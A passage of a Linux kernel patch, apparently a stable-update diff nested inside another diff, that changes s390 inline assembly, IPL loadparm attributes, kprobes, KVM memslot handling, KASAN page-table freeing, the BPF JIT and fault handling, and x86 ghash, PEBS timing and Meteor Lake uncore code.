+-		: "cc", "0", "1", "2");
++		: "cc", "memory", "0", "1", "2");
+ 
+ 	return reg1.status;
+ }
+@@ -290,7 +293,10 @@ static inline struct ap_queue_status ap_qact(ap_qid_t qid, int ifbit,
+ 	unsigned long reg0 = qid | (5UL << 24) | ((ifbit & 0x01) << 22);
+ 	union {
+ 		unsigned long value;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2;
+ 
+diff --git a/arch/s390/kernel/early.c b/arch/s390/kernel/early.c
+index 6030fdd6997bc..9693c8630e73f 100644
+--- a/arch/s390/kernel/early.c
++++ b/arch/s390/kernel/early.c
+@@ -288,7 +288,6 @@ static void __init sort_amode31_extable(void)
+ 
+ void __init startup_init(void)
+ {
+-	sclp_early_adjust_va();
+ 	reset_tod_clock();
+ 	check_image_bootable();
+ 	time_early_init();
+diff --git a/arch/s390/kernel/head64.S b/arch/s390/kernel/head64.S
+index d7b8b6ad574dc..3b3bf8329e6c1 100644
+--- a/arch/s390/kernel/head64.S
++++ b/arch/s390/kernel/head64.S
+@@ -25,6 +25,7 @@ ENTRY(startup_continue)
+ 	larl	%r14,init_task
+ 	stg	%r14,__LC_CURRENT
+ 	larl	%r15,init_thread_union+THREAD_SIZE-STACK_FRAME_OVERHEAD-__PT_SIZE
++	brasl	%r14,sclp_early_adjust_va	# allow sclp_early_printk
+ #ifdef CONFIG_KASAN
+ 	brasl	%r14,kasan_early_init
+ #endif
+diff --git a/arch/s390/kernel/idle.c b/arch/s390/kernel/idle.c
+index 4bf1ee293f2b3..a0da049e73609 100644
+--- a/arch/s390/kernel/idle.c
++++ b/arch/s390/kernel/idle.c
+@@ -44,7 +44,7 @@ void account_idle_time_irq(void)
+ 	S390_lowcore.last_update_timer = idle->timer_idle_exit;
+ }
+ 
+-void arch_cpu_idle(void)
++void noinstr arch_cpu_idle(void)
+ {
+ 	struct s390_idle_data *idle = this_cpu_ptr(&s390_idle);
+ 	unsigned long idle_time;
+diff --git a/arch/s390/kernel/ipl.c b/arch/s390/kernel/ipl.c
+index fbd646dbf4402..bcf03939e6fe8 100644
+--- a/arch/s390/kernel/ipl.c
++++ b/arch/s390/kernel/ipl.c
+@@ -593,6 +593,7 @@ static struct attribute *ipl_eckd_attrs[] = {
+ 	&sys_ipl_type_attr.attr,
+ 	&sys_ipl_eckd_bootprog_attr.attr,
+ 	&sys_ipl_eckd_br_chr_attr.attr,
++	&sys_ipl_ccw_loadparm_attr.attr,
+ 	&sys_ipl_device_attr.attr,
+ 	&sys_ipl_secure_attr.attr,
+ 	&sys_ipl_has_secure_attr.attr,
+@@ -888,23 +889,27 @@ static ssize_t reipl_generic_loadparm_store(struct ipl_parameter_block *ipb,
+ 	return len;
+ }
+ 
+-/* FCP wrapper */
+-static ssize_t reipl_fcp_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_fcp, page);
+-}
+-
+-static ssize_t reipl_fcp_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_fcp, buf, len);
+-}
+-
+-static struct kobj_attribute sys_reipl_fcp_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_fcp_loadparm_show,
+-	       reipl_fcp_loadparm_store);
++#define DEFINE_GENERIC_LOADPARM(name)							\
++static ssize_t reipl_##name##_loadparm_show(struct kobject *kobj,			\
++					    struct kobj_attribute *attr, char *page)	\
++{											\
++	return reipl_generic_loadparm_show(reipl_block_##name, page);			\
++}											\
++static ssize_t reipl_##name##_loadparm_store(struct kobject *kobj,			\
++					     struct kobj_attribute *attr,		\
++					     const char *buf, size_t len)		\
++{											\
++	return reipl_generic_loadparm_store(reipl_block_##name, buf, len);		\
++}											\
++static struct kobj_attribute sys_reipl_##name##_loadparm_attr =				\
++	__ATTR(loadparm, 0644, reipl_##name##_loadparm_show,				\
++	       reipl_##name##_loadparm_store)
++
++DEFINE_GENERIC_LOADPARM(fcp);
++DEFINE_GENERIC_LOADPARM(nvme);
++DEFINE_GENERIC_LOADPARM(ccw);
++DEFINE_GENERIC_LOADPARM(nss);
++DEFINE_GENERIC_LOADPARM(eckd);
+ 
+ static ssize_t reipl_fcp_clear_show(struct kobject *kobj,
+ 				    struct kobj_attribute *attr, char *page)
+@@ -994,24 +999,6 @@ DEFINE_IPL_ATTR_RW(reipl_nvme, bootprog, "%lld\n", "%lld\n",
+ DEFINE_IPL_ATTR_RW(reipl_nvme, br_lba, "%lld\n", "%lld\n",
+ 		   reipl_block_nvme->nvme.br_lba);
+ 
+-/* nvme wrapper */
+-static ssize_t reipl_nvme_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_nvme, page);
+-}
+-
+-static ssize_t reipl_nvme_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_nvme, buf, len);
+-}
+-
+-static struct kobj_attribute sys_reipl_nvme_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_nvme_loadparm_show,
+-	       reipl_nvme_loadparm_store);
+-
+ static struct attribute *reipl_nvme_attrs[] = {
+ 	&sys_reipl_nvme_fid_attr.attr,
+ 	&sys_reipl_nvme_nsid_attr.attr,
+@@ -1047,38 +1034,6 @@ static struct kobj_attribute sys_reipl_nvme_clear_attr =
+ /* CCW reipl device attributes */
+ DEFINE_IPL_CCW_ATTR_RW(reipl_ccw, device, reipl_block_ccw->ccw);
+ 
+-/* NSS wrapper */
+-static ssize_t reipl_nss_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_nss, page);
+-}
+-
+-static ssize_t reipl_nss_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_nss, buf, len);
+-}
+-
+-/* CCW wrapper */
+-static ssize_t reipl_ccw_loadparm_show(struct kobject *kobj,
+-				       struct kobj_attribute *attr, char *page)
+-{
+-	return reipl_generic_loadparm_show(reipl_block_ccw, page);
+-}
+-
+-static ssize_t reipl_ccw_loadparm_store(struct kobject *kobj,
+-					struct kobj_attribute *attr,
+-					const char *buf, size_t len)
+-{
+-	return reipl_generic_loadparm_store(reipl_block_ccw, buf, len);
+-}
+-
+-static struct kobj_attribute sys_reipl_ccw_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_ccw_loadparm_show,
+-	       reipl_ccw_loadparm_store);
+-
+ static ssize_t reipl_ccw_clear_show(struct kobject *kobj,
+ 				    struct kobj_attribute *attr, char *page)
+ {
+@@ -1176,6 +1131,7 @@ static struct attribute *reipl_eckd_attrs[] = {
+ 	&sys_reipl_eckd_device_attr.attr,
+ 	&sys_reipl_eckd_bootprog_attr.attr,
+ 	&sys_reipl_eckd_br_chr_attr.attr,
++	&sys_reipl_eckd_loadparm_attr.attr,
+ 	NULL,
+ };
+ 
+@@ -1251,10 +1207,6 @@ static struct kobj_attribute sys_reipl_nss_name_attr =
+ 	__ATTR(name, 0644, reipl_nss_name_show,
+ 	       reipl_nss_name_store);
+ 
+-static struct kobj_attribute sys_reipl_nss_loadparm_attr =
+-	__ATTR(loadparm, 0644, reipl_nss_loadparm_show,
+-	       reipl_nss_loadparm_store);
+-
+ static struct attribute *reipl_nss_attrs[] = {
+ 	&sys_reipl_nss_name_attr.attr,
+ 	&sys_reipl_nss_loadparm_attr.attr,
+diff --git a/arch/s390/kernel/kprobes.c b/arch/s390/kernel/kprobes.c
+index 401f9c933ff94..5ca02680fc3c6 100644
+--- a/arch/s390/kernel/kprobes.c
++++ b/arch/s390/kernel/kprobes.c
+@@ -278,6 +278,7 @@ static void pop_kprobe(struct kprobe_ctlblk *kcb)
+ {
+ 	__this_cpu_write(current_kprobe, kcb->prev_kprobe.kp);
+ 	kcb->kprobe_status = kcb->prev_kprobe.status;
++	kcb->prev_kprobe.kp = NULL;
+ }
+ NOKPROBE_SYMBOL(pop_kprobe);
+ 
+@@ -432,12 +433,11 @@ static int post_kprobe_handler(struct pt_regs *regs)
+ 	if (!p)
+ 		return 0;
+ 
++	resume_execution(p, regs);
+ 	if (kcb->kprobe_status != KPROBE_REENTER && p->post_handler) {
+ 		kcb->kprobe_status = KPROBE_HIT_SSDONE;
+ 		p->post_handler(p, regs, 0);
+ 	}
+-
+-	resume_execution(p, regs);
+ 	pop_kprobe(kcb);
+ 	preempt_enable_no_resched();
+ 
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 9e2b95a222a98..1605ba45ac4c0 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -25,7 +25,7 @@ KBUILD_AFLAGS_64 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_64 += -m64 -fPIC -shared -fno-common -fno-builtin
++KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
+ ldflags-y := -fPIC -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index cbf9c1b0beda4..729d4f949cfe8 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -228,5 +228,6 @@ SECTIONS
+ 	DISCARDS
+ 	/DISCARD/ : {
+ 		*(.eh_frame)
++		*(.interp)
+ 	}
+ }
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index e4890e04b2108..cb72f9a09fb36 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -5633,23 +5633,40 @@ int kvm_arch_prepare_memory_region(struct kvm *kvm,
+ 	if (kvm_s390_pv_get_handle(kvm))
+ 		return -EINVAL;
+ 
+-	if (change == KVM_MR_DELETE || change == KVM_MR_FLAGS_ONLY)
+-		return 0;
++	if (change != KVM_MR_DELETE && change != KVM_MR_FLAGS_ONLY) {
++		/*
++		 * A few sanity checks. We can have memory slots which have to be
++		 * located/ended at a segment boundary (1MB). The memory in userland is
++		 * ok to be fragmented into various different vmas. It is okay to mmap()
++		 * and munmap() stuff in this slot after doing this call at any time
++		 */
+ 
+-	/* A few sanity checks. We can have memory slots which have to be
+-	   located/ended at a segment boundary (1MB). The memory in userland is
+-	   ok to be fragmented into various different vmas. It is okay to mmap()
+-	   and munmap() stuff in this slot after doing this call at any time */
++		if (new->userspace_addr & 0xffffful)
++			return -EINVAL;
+ 
+-	if (new->userspace_addr & 0xffffful)
+-		return -EINVAL;
++		size = new->npages * PAGE_SIZE;
++		if (size & 0xffffful)
++			return -EINVAL;
+ 
+-	size = new->npages * PAGE_SIZE;
+-	if (size & 0xffffful)
+-		return -EINVAL;
++		if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
++			return -EINVAL;
++	}
+ 
+-	if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
+-		return -EINVAL;
++	if (!kvm->arch.migration_mode)
++		return 0;
++
++	/*
++	 * Turn off migration mode when:
++	 * - userspace creates a new memslot with dirty logging off,
++	 * - userspace modifies an existing memslot (MOVE or FLAGS_ONLY) and
++	 *   dirty logging is turned off.
++	 * Migration mode expects dirty page logging being enabled to store
++	 * its dirty bitmap.
++	 */
++	if (change != KVM_MR_DELETE &&
++	    !(new->flags & KVM_MEM_LOG_DIRTY_PAGES))
++		WARN(kvm_s390_vm_stop_migration(kvm),
++		     "Failed to stop migration mode");
+ 
+ 	return 0;
+ }
+diff --git a/arch/s390/mm/dump_pagetables.c b/arch/s390/mm/dump_pagetables.c
+index 9953819d79596..ba5f802688781 100644
+--- a/arch/s390/mm/dump_pagetables.c
++++ b/arch/s390/mm/dump_pagetables.c
+@@ -33,10 +33,6 @@ enum address_markers_idx {
+ #endif
+ 	IDENTITY_AFTER_NR,
+ 	IDENTITY_AFTER_END_NR,
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	VMEMMAP_NR,
+ 	VMEMMAP_END_NR,
+ 	VMALLOC_NR,
+@@ -47,6 +43,10 @@ enum address_markers_idx {
+ 	ABS_LOWCORE_END_NR,
+ 	MEMCPY_REAL_NR,
+ 	MEMCPY_REAL_END_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ };
+ 
+ static struct addr_marker address_markers[] = {
+@@ -62,10 +62,6 @@ static struct addr_marker address_markers[] = {
+ #endif
+ 	[IDENTITY_AFTER_NR]	= {(unsigned long)_end, "Identity Mapping Start"},
+ 	[IDENTITY_AFTER_END_NR]	= {0, "Identity Mapping End"},
+-#ifdef CONFIG_KASAN
+-	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
+-	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
+-#endif
+ 	[VMEMMAP_NR]		= {0, "vmemmap Area Start"},
+ 	[VMEMMAP_END_NR]	= {0, "vmemmap Area End"},
+ 	[VMALLOC_NR]		= {0, "vmalloc Area Start"},
+@@ -76,6 +72,10 @@ static struct addr_marker address_markers[] = {
+ 	[ABS_LOWCORE_END_NR]	= {0, "Lowcore Area End"},
+ 	[MEMCPY_REAL_NR]	= {0, "Real Memory Copy Area Start"},
+ 	[MEMCPY_REAL_END_NR]	= {0, "Real Memory Copy Area End"},
++#ifdef CONFIG_KASAN
++	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
++	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
++#endif
+ 	{ -1, NULL }
+ };
+ 
+diff --git a/arch/s390/mm/extmem.c b/arch/s390/mm/extmem.c
+index 5060956b8e7d6..1bc42ce265990 100644
+--- a/arch/s390/mm/extmem.c
++++ b/arch/s390/mm/extmem.c
+@@ -289,15 +289,17 @@ segment_overlaps_others (struct dcss_segment *seg)
+ 
+ /*
+  * real segment loading function, called from segment_load
++ * Must return either an error code < 0, or the segment type code >= 0
+  */
+ static int
+ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long *end)
+ {
+ 	unsigned long start_addr, end_addr, dummy;
+ 	struct dcss_segment *seg;
+-	int rc, diag_cc;
++	int rc, diag_cc, segtype;
+ 
+ 	start_addr = end_addr = 0;
++	segtype = -1;
+ 	seg = kmalloc(sizeof(*seg), GFP_KERNEL | GFP_DMA);
+ 	if (seg == NULL) {
+ 		rc = -ENOMEM;
+@@ -326,9 +328,9 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+ 	seg->res_name[8] = '\0';
+ 	strlcat(seg->res_name, " (DCSS)", sizeof(seg->res_name));
+ 	seg->res->name = seg->res_name;
+-	rc = seg->vm_segtype;
+-	if (rc == SEG_TYPE_SC ||
+-	    ((rc == SEG_TYPE_SR || rc == SEG_TYPE_ER) && !do_nonshared))
++	segtype = seg->vm_segtype;
++	if (segtype == SEG_TYPE_SC ||
++	    ((segtype == SEG_TYPE_SR || segtype == SEG_TYPE_ER) && !do_nonshared))
+ 		seg->res->flags |= IORESOURCE_READONLY;
+ 
+ 	/* Check for overlapping resources before adding the mapping. */
+@@ -386,7 +388,7 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+  out_free:
+ 	kfree(seg);
+  out:
+-	return rc;
++	return rc < 0 ? rc : segtype;
+ }
+ 
+ /*
+diff --git a/arch/s390/mm/fault.c b/arch/s390/mm/fault.c
+index 9649d9382e0ae..8e84ed2bb944e 100644
+--- a/arch/s390/mm/fault.c
++++ b/arch/s390/mm/fault.c
+@@ -96,6 +96,20 @@ static enum fault_type get_fault_type(struct pt_regs *regs)
+ 	return KERNEL_FAULT;
+ }
+ 
++static unsigned long get_fault_address(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return trans_exc_code & __FAIL_ADDR_MASK;
++}
++
++static bool fault_is_write(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return (trans_exc_code & store_indication) == 0x400;
++}
++
+ static int bad_address(void *p)
+ {
+ 	unsigned long dummy;
+@@ -228,15 +242,26 @@ static noinline void do_sigsegv(struct pt_regs *regs, int si_code)
+ 			(void __user *)(regs->int_parm_long & __FAIL_ADDR_MASK));
+ }
+ 
+-static noinline void do_no_context(struct pt_regs *regs)
++static noinline void do_no_context(struct pt_regs *regs, vm_fault_t fault)
+ {
++	enum fault_type fault_type;
++	unsigned long address;
++	bool is_write;
++
+ 	if (fixup_exception(regs))
+ 		return;
++	fault_type = get_fault_type(regs);
++	if ((fault_type == KERNEL_FAULT) && (fault == VM_FAULT_BADCONTEXT)) {
++		address = get_fault_address(regs);
++		is_write = fault_is_write(regs);
++		if (kfence_handle_page_fault(address, is_write, regs))
++			return;
++	}
+ 	/*
+ 	 * Oops. The kernel tried to access some bad page. We'll have to
+ 	 * terminate things with extreme prejudice.
+ 	 */
+-	if (get_fault_type(regs) == KERNEL_FAULT)
++	if (fault_type == KERNEL_FAULT)
+ 		printk(KERN_ALERT "Unable to handle kernel pointer dereference"
+ 		       " in virtual kernel address space\n");
+ 	else
+@@ -255,7 +280,7 @@ static noinline void do_low_address(struct pt_regs *regs)
+ 		die (regs, "Low-address protection");
+ 	}
+ 
+-	do_no_context(regs);
++	do_no_context(regs, VM_FAULT_BADACCESS);
+ }
+ 
+ static noinline void do_sigbus(struct pt_regs *regs)
+@@ -286,28 +311,28 @@ static noinline void do_fault_error(struct pt_regs *regs, vm_fault_t fault)
+ 		fallthrough;
+ 	case VM_FAULT_BADCONTEXT:
+ 	case VM_FAULT_PFAULT:
+-		do_no_context(regs);
++		do_no_context(regs, fault);
+ 		break;
+ 	case VM_FAULT_SIGNAL:
+ 		if (!user_mode(regs))
+-			do_no_context(regs);
++			do_no_context(regs, fault);
+ 		break;
+ 	default: /* fault & VM_FAULT_ERROR */
+ 		if (fault & VM_FAULT_OOM) {
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				pagefault_out_of_memory();
+ 		} else if (fault & VM_FAULT_SIGSEGV) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigsegv(regs, SEGV_MAPERR);
+ 		} else if (fault & VM_FAULT_SIGBUS) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigbus(regs);
+ 		} else
+@@ -334,7 +359,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	struct mm_struct *mm;
+ 	struct vm_area_struct *vma;
+ 	enum fault_type type;
+-	unsigned long trans_exc_code;
+ 	unsigned long address;
+ 	unsigned int flags;
+ 	vm_fault_t fault;
+@@ -351,9 +375,8 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 		return 0;
+ 
+ 	mm = tsk->mm;
+-	trans_exc_code = regs->int_parm_long;
+-	address = trans_exc_code & __FAIL_ADDR_MASK;
+-	is_write = (trans_exc_code & store_indication) == 0x400;
++	address = get_fault_address(regs);
++	is_write = fault_is_write(regs);
+ 
+ 	/*
+ 	 * Verify that the fault happened in user space, that
+@@ -364,8 +387,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	type = get_fault_type(regs);
+ 	switch (type) {
+ 	case KERNEL_FAULT:
+-		if (kfence_handle_page_fault(address, is_write, regs))
+-			return 0;
+ 		goto out;
+ 	case USER_FAULT:
+ 	case GMAP_FAULT:
+diff --git a/arch/s390/mm/vmem.c b/arch/s390/mm/vmem.c
+index ee1a97078527b..9a0ce5315f36d 100644
+--- a/arch/s390/mm/vmem.c
++++ b/arch/s390/mm/vmem.c
+@@ -297,7 +297,7 @@ static void try_free_pmd_table(pud_t *pud, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 	pmd = pmd_offset(pud, start);
+@@ -372,7 +372,7 @@ static void try_free_pud_table(p4d_t *p4d, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+@@ -426,7 +426,7 @@ static void try_free_p4d_table(pgd_t *pgd, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c
+index af35052d06ed6..fbdba4c306bea 100644
+--- a/arch/s390/net/bpf_jit_comp.c
++++ b/arch/s390/net/bpf_jit_comp.c
+@@ -1393,8 +1393,16 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp,
+ 		/* lg %r1,bpf_func(%r1) */
+ 		EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, REG_1, REG_0,
+ 			      offsetof(struct bpf_prog, bpf_func));
+-		/* bc 0xf,tail_call_start(%r1) */
+-		_EMIT4(0x47f01000 + jit->tail_call_start);
++		if (nospec_uses_trampoline()) {
++			jit->seen |= SEEN_FUNC;
++			/* aghi %r1,tail_call_start */
++			EMIT4_IMM(0xa70b0000, REG_1, jit->tail_call_start);
++			/* brcl 0xf,__s390_indirect_jump_r1 */
++			EMIT6_PCREL_RILC(0xc0040000, 0xf, jit->r1_thunk_ip);
++		} else {
++			/* bc 0xf,tail_call_start(%r1) */
++			_EMIT4(0x47f01000 + jit->tail_call_start);
++		}
+ 		/* out: */
+ 		if (jit->prg_buf) {
+ 			*(u16 *)(jit->prg_buf + patch_1_clrj + 2) =
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index 4d3d1af90d521..84437a4c65454 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -283,7 +283,7 @@ config ARCH_FORCE_MAX_ORDER
+ 	  This config option is actually maximum order plus one. For example,
+ 	  a value of 13 means that the largest free memory block is 2^12 pages.
+ 
+-if SPARC64
++if SPARC64 || COMPILE_TEST
+ source "kernel/power/Kconfig"
+ endif
+ 
+diff --git a/arch/x86/crypto/ghash-clmulni-intel_glue.c b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+index 1f1a95f3dd0ca..c0ab0ff4af655 100644
+--- a/arch/x86/crypto/ghash-clmulni-intel_glue.c
++++ b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+@@ -19,6 +19,7 @@
+ #include <crypto/internal/simd.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
++#include <asm/unaligned.h>
+ 
+ #define GHASH_BLOCK_SIZE	16
+ #define GHASH_DIGEST_SIZE	16
+@@ -54,15 +55,14 @@ static int ghash_setkey(struct crypto_shash *tfm,
+ 			const u8 *key, unsigned int keylen)
+ {
+ 	struct ghash_ctx *ctx = crypto_shash_ctx(tfm);
+-	be128 *x = (be128 *)key;
+ 	u64 a, b;
+ 
+ 	if (keylen != GHASH_BLOCK_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* perform multiplication by 'x' in GF(2^128) */
+-	a = be64_to_cpu(x->a);
+-	b = be64_to_cpu(x->b);
++	a = get_unaligned_be64(key);
++	b = get_unaligned_be64(key + 8);
+ 
+ 	ctx->shash.a = (b << 1) | (a >> 63);
+ 	ctx->shash.b = (a << 1) | (b >> 63);
+diff --git a/arch/x86/events/intel/ds.c b/arch/x86/events/intel/ds.c
+index 88e58b6ee73c0..91b214231e03c 100644
+--- a/arch/x86/events/intel/ds.c
++++ b/arch/x86/events/intel/ds.c
+@@ -2,12 +2,14 @@
+ #include <linux/bitops.h>
+ #include <linux/types.h>
+ #include <linux/slab.h>
++#include <linux/sched/clock.h>
+ 
+ #include <asm/cpu_entry_area.h>
+ #include <asm/perf_event.h>
+ #include <asm/tlbflush.h>
+ #include <asm/insn.h>
+ #include <asm/io.h>
++#include <asm/timer.h>
+ 
+ #include "../perf_event.h"
+ 
+@@ -1519,6 +1521,27 @@ static u64 get_data_src(struct perf_event *event, u64 aux)
+ 	return val;
+ }
+ 
++static void setup_pebs_time(struct perf_event *event,
++			    struct perf_sample_data *data,
++			    u64 tsc)
++{
++	/* Converting to a user-defined clock is not supported yet. */
++	if (event->attr.use_clockid != 0)
++		return;
++
++	/*
++	 * Doesn't support the conversion when the TSC is unstable.
++	 * The TSC unstable case is a corner case and very unlikely to
++	 * happen. If it happens, the TSC in a PEBS record will be
++	 * dropped and fall back to perf_event_clock().
++	 */
++	if (!using_native_sched_clock() || !sched_clock_stable())
++		return;
++
++	data->time = native_sched_clock_from_tsc(tsc) + __sched_clock_offset;
++	data->sample_flags |= PERF_SAMPLE_TIME;
++}
++
+ #define PERF_SAMPLE_ADDR_TYPE	(PERF_SAMPLE_ADDR |		\
+ 				 PERF_SAMPLE_PHYS_ADDR |	\
+ 				 PERF_SAMPLE_DATA_PAGE_SIZE)
+@@ -1668,11 +1691,8 @@ static void setup_pebs_fixed_sample_data(struct perf_event *event,
+ 	 *
+ 	 * We can only do this for the default trace clock.
+ 	 */
+-	if (x86_pmu.intel_cap.pebs_format >= 3 &&
+-		event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(pebs->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	if (x86_pmu.intel_cap.pebs_format >= 3)
++		setup_pebs_time(event, data, pebs->tsc);
+ 
+ 	if (has_branch_stack(event)) {
+ 		data->br_stack = &cpuc->lbr_stack;
+@@ -1735,10 +1755,7 @@ static void setup_pebs_adaptive_sample_data(struct perf_event *event,
+ 	perf_sample_data_init(data, 0, event->hw.last_period);
+ 	data->period = event->hw.last_period;
+ 
+-	if (event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(basic->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	setup_pebs_time(event, data, basic->tsc);
+ 
+ 	/*
+ 	 * We must however always use iregs for the unwinder to stay sane; the
+diff --git a/arch/x86/events/intel/uncore.c b/arch/x86/events/intel/uncore.c
+index 459b1aafd4d4a..27b34f5b87600 100644
+--- a/arch/x86/events/intel/uncore.c
++++ b/arch/x86/events/intel/uncore.c
+@@ -1765,6 +1765,11 @@ static const struct intel_uncore_init_fun adl_uncore_init __initconst = {
+ 	.mmio_init = adl_uncore_mmio_init,
+ };
+ 
++static const struct intel_uncore_init_fun mtl_uncore_init __initconst = {
++	.cpu_init = mtl_uncore_cpu_init,
++	.mmio_init = adl_uncore_mmio_init,
++};
++
+ static const struct intel_uncore_init_fun icx_uncore_init __initconst = {
+ 	.cpu_init = icx_uncore_cpu_init,
+ 	.pci_init = icx_uncore_pci_init,
+@@ -1832,6 +1837,8 @@ static const struct x86_cpu_id intel_uncore_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&mtl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&mtl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_TREMONT_D,	&snr_uncore_init),
+diff --git a/arch/x86/events/intel/uncore.h b/arch/x86/events/intel/uncore.h
+index e278e2e7c051a..305a54d88beee 100644
+--- a/arch/x86/events/intel/uncore.h
++++ b/arch/x86/events/intel/uncore.h
+@@ -602,6 +602,7 @@ void skl_uncore_cpu_init(void);
+ void icl_uncore_cpu_init(void);
+ void tgl_uncore_cpu_init(void);
+ void adl_uncore_cpu_init(void);
++void mtl_uncore_cpu_init(void);
+ void tgl_uncore_mmio_init(void);
+ void tgl_l_uncore_mmio_init(void);
+ void adl_uncore_mmio_init(void);
+diff --git a/arch/x86/events/intel/uncore_snb.c b/arch/x86/events/intel/uncore_snb.c
+index 1f4869227efb9..7fd4334e12a17 100644
+--- a/arch/x86/events/intel/uncore_snb.c
++++ b/arch/x86/events/intel/uncore_snb.c
+@@ -109,6 +109,19 @@
+ #define PCI_DEVICE_ID_INTEL_RPL_23_IMC		0xA728
